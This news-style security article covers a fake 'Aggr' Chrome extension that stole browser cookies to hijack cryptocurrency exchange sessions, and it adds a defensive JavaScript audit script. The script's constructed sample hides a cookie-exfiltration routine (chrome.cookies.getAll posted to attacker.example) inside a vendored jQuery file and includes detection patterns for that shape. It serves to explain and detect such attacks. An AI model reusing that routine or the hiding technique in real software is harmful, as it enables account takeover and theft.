A malicious Chrome extension that posed as a legitimate trading tool has been found stealing users' browser cookies and, through them, their cryptocurrency assets. The case has raised alarm across the cryptocurrency community because the extension was listed on the Chrome Web Store and looked trustworthy.
The Discovery of the Malicious Extension
The malicious extension came to light on March 1, 2024, when Twitter user @doomxbt reported unusual activity in their Binance account that pointed to a theft of funds. Initially the incident drew little attention. On May 28, 2024, Twitter user @TreeofAlpha found that the victim had installed a fraudulent "Aggr" extension from the Chrome Web Store; the listing was highly rated and appeared legitimate.
The Mechanics of the Attack
After downloading and analyzing the extension, the security team at SlowMist, a cybersecurity firm, found that it could collect every cookie from every website the user visited. The extension had also been promoted by influential accounts two months earlier, which points to a coordinated campaign rather than an opportunistic upload.
Analysis of the Malicious Code
The extension bundled two versions of jQuery, and the malicious code was hidden inside those jQuery files, where a reviewer skimming for custom logic would be unlikely to look. The code exfiltrated the collected cookies to an attacker-controlled endpoint at https://aggrtrade-extension[.]com/statistics_collection/index[.]php.
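The two findings above (a "cookies" permission combined with access to every site, and cookie-reading code hidden in a vendored library that also talks to an outside host) are exactly what a static audit of an unpacked extension should catch before installation. The following is an added example written for this article, not SlowMist's tooling and not the extension's real source: it scans a constructed set of extension files for that pattern. The sample manifest and scripts are fabricated, and the hostname attacker.example stands in for the reported endpoint.

```javascript
// Added example (editor's illustration, not SlowMist's tooling and not the
// extension's real source): a static audit of an unpacked Chrome extension
// that flags the pattern the article describes. Every file below is
// constructed for this example; attacker.example stands in for the reported
// endpoint, which the article gives as aggrtrade-extension[.]com.

const SAMPLE_FILES = {
  "manifest.json": JSON.stringify({
    manifest_version: 3,
    name: "Aggr lookalike (constructed sample)",
    permissions: ["cookies", "storage"],
    host_permissions: ["<all_urls>"],
    background: { service_worker: "jquery-3.6.0.min.js" },
  }),
  // A vendored jQuery file with a cookie exfiltration routine appended to it.
  "jquery-3.6.0.min.js":
    "/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors */\n" +
    '!function(e,t){"use strict";/* library body elided */}();\n' +
    "chrome.cookies.getAll({}, function (all) {\n" +
    '  fetch("https://attacker.example/statistics_collection/index.php",\n' +
    '        { method: "POST", body: JSON.stringify(all) });\n' +
    "});\n",
  // Benign UI code: touches extension storage only, no cookies, no network.
  "popup.js":
    'document.getElementById("go").onclick = () =>\n' +
    "  chrome.storage.local.set({ started: true });\n",
};

// Host patterns that grant access to every site the user visits.
const BROAD_HOSTS = new Set(["<all_urls>", "*://*/*", "http://*/*", "https://*/*"]);
// APIs that read cookies, sinks that send data out, and literal URLs.
const COOKIE_API = /\b(?:chrome|browser)\.cookies\.(?:getAll|get)\b|\bdocument\.cookie\b/g;
const NETWORK_SINK = /\b(?:fetch|XMLHttpRequest|navigator\.sendBeacon|\$\.(?:ajax|post|get))\b/;
const URL_LITERAL = /https?:\/\/[A-Za-z0-9.-]+(?:\/[^\s"'`)]*)?/g;
// Third-party libraries that have no business calling the cookies API.
const VENDORED_LIB = /^(?:jquery|lodash|underscore|react|vue)[\w.-]*\.js$/i;

function auditExtension(files) {
  const findings = [];
  const manifest = JSON.parse(files["manifest.json"]);
  const perms = manifest.permissions || [];
  // MV2 lists host patterns under "permissions"; MV3 uses "host_permissions".
  const hosts = [...(manifest.host_permissions || []), ...perms];
  const broad = hosts.filter((h) => BROAD_HOSTS.has(h));
  if (perms.includes("cookies") && broad.length > 0) {
    findings.push({
      file: "manifest.json",
      rule: "cookies-permission-with-broad-host-access",
      detail: broad.join(", "),
    });
  }

  for (const [path, src] of Object.entries(files)) {
    if (!path.endsWith(".js")) continue;
    const cookieReads = src.match(COOKIE_API) || [];
    const externalHosts = [
      ...new Set((src.match(URL_LITERAL) || []).map((u) => new URL(u).hostname)),
    ];
    // Cookie read plus an outbound sink plus a hard-coded host: the exfil shape.
    if (cookieReads.length > 0 && NETWORK_SINK.test(src) && externalHosts.length > 0) {
      findings.push({
        file: path,
        rule: "cookie-read-with-network-egress",
        detail: `${cookieReads[0]} -> ${externalHosts.join(", ")}`,
      });
    }
    // Real jQuery never calls chrome.cookies; a vendored file that does was tampered with.
    if (VENDORED_LIB.test(path) && cookieReads.length > 0) {
      findings.push({
        file: path,
        rule: "cookie-api-inside-vendored-library",
        detail: cookieReads[0],
      });
    }
  }
  return findings;
}

// Hostnames the egress findings point at, usable as blocklist / IOC material.
function egressHosts(findings) {
  return [
    ...new Set(
      findings
        .filter((f) => f.rule === "cookie-read-with-network-egress")
        .flatMap((f) => f.detail.split(" -> ")[1].split(", ")),
    ),
  ];
}

for (const f of auditExtension(SAMPLE_FILES)) {
  console.log(`[${f.rule}] ${f.file}: ${f.detail}`);
}
```

Run against a real unpacked extension by loading its files into the same path-to-source map. Note what this does and does not prove: the manifest rule fires on capability (an extension that can read every cookie on every site), and the code rules fire on a textual pattern, so a minified or string-obfuscated exfil routine will need dynamic analysis (watch the extension's outbound requests in a sandboxed profile) rather than regexes. A clean result from this script is therefore a necessary, not sufficient, condition for trusting an extension.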
The Target Audience and Attack Strategy
The extension was aimed squarely at cryptocurrency users. Session cookies are the browser's proof that a user has already logged in, so an attacker who replays stolen cookies from their own machine inherits the victim's authenticated session without ever learning the password, and can then place trades or otherwise act on the victim's behalf on the exchange. The attack is sometimes described as man-in-the-middle, but nothing is intercepted in transit: it is session hijacking using exfiltrated cookies.
The Origin of the Attack
Further analysis of the malicious website, aggrtrade-extension[.]com, indicated that the attackers had been preparing the operation for about three years. The attackers, assessed as likely based in Russia or Eastern Europe, deployed the extension roughly four months before the discovery and then promoted it on Twitter, waiting for unsuspecting users to install it.
The Response and Prevention Measures
SlowMist has issued a public warning about the risks of browser extensions and the need to scrutinize any such tool carefully before installing it: check what permissions it requests, who publishes it, and whether a highly rated listing actually matches the tool it claims to be. They also advised users to be wary of private messages from accounts posing as legitimate, well-known projects, which often use offers of sponsorship or promotion to draw content creators into fraud.
The Importance of Cybersecurity Awareness
This incident serves as a stark reminder of the importance of cybersecurity awareness in the digital age, especially within the cryptocurrency community. Users are advised to remain vigilant and to ensure that any tools they install are safe and do not pose a risk to their privacy and financial security.
Conclusion
The discovery of the malicious Chrome extension is a testament to the evolving nature of cyber threats and the importance of proactive cybersecurity measures. As technology advances, so do the methods employed by cybercriminals. It is crucial for users to stay informed and to adopt best practices to protect themselves from such attacks.